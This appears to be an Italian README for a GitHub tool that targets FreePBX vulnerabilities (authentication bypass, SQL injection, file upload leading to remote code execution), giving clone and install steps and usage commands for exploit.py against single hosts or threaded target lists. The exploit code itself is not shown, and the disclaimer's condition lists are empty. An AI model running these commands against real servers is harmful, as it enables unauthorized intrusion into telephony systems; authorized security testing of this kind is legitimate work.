
Questa vulnerabilità consente a malintenzionati remoti, sia autenticati che non autenticati, di eseguire codice remoto su istanze FreePBX vulnerabili. Questi problemi sono stati risolti nelle versioni 16.0.42, 16.0.92, 17.0.6 e 17.0.22 di FreePBX. È importante notare che questa vulnerabilità di bypass dell'autenticazione non è presente nella configurazione predefinita di FreePBX.
SOLO PER TEST EDUCATIVI E AUTORIZZATI
USANDO QUESTO STRUMENTO, ACCETTI DI UTILIZZARLO IN MODO LEGALE ED ETICO.
Uno strumento di valutazione della sicurezza per rilevare vulnerabilità critiche nei sistemi FreePBX.
requirements.txt per le dipendenzegit clone https://github.com/BimBoxH4/CVE-2025-66039_CVE-2025-61675_CVE-2025-61678_reePBX.git
cd CVE-2025-66039_CVE-2025-61675_CVE-2025-61678_reePBX
pip3 install -r requirements.txt
# Single target scan
python3 exploit.py -u http://target-ip
# Multiple targets with threads
python3 exploit.py -l targets.txt -t 10
# Debug mode
python3 exploit.py -u http://target-ip -d
# Save results
python3 exploit.py -l targets.txt -o results.txt
# All checks (default)
python3 exploit.py -u http://target-ip --mode all
# File upload only
python3 exploit.py -u http://target-ip --mode upload
# SQL injection only
python3 exploit.py -u http://target-ip --mode sql
# Auth bypass only
python3 exploit.py -u http://target-ip --mode auth
| Argomento | Descrizione |
|---|---|
-u, --url | URL del singolo target |
-l, --list | File con URL dei target (uno per riga) |
-t, --threads | Numero di thread (predefinito: 1) |
-o, --output | File di output per i risultati |
-d, --debug | Abilita modalità debug |
--mode | Modalità di scansione: all, upload, sql, auth |
http://192.168.1.100
http://192.168.1.101
https://freepbx.example.com
# Comments start with #
Usa questo strumento solo se:
Mai:
⚠️ RICORDA: l'accesso non autorizzato è illegale. Usa responsabilmente!